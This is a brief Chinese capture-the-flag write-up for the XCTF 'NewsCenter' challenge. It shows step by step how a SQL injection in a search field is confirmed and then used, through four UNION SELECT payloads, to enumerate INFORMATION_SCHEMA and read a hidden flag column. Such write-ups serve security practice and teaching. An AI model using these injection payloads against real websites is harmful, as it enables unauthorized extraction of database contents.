[src = 攻防世界] NewsCenter
题目描述
WP
题目显示一个Search news,随便输入几个数字会发现下面的显示结果变化。输入“1’”程序报错,所以基本确认存在SQLi。下面利用Union查询,测试显示对列数。
输入payload:
1 | 11111' union select 1,2,3 # |
显示如下:
发现有三列,并输出第二列和第三列。则可以利用这两列获取数据库信息,payload如下:
1 | 111111' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # |
在最下面发现secret_table。然后表内信息:
1 | 11111111' union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# |
发现一个fl4g字段。然后显示该字段得到flag:
1 | 111111' union select 1,2,fl4g from secret_table # |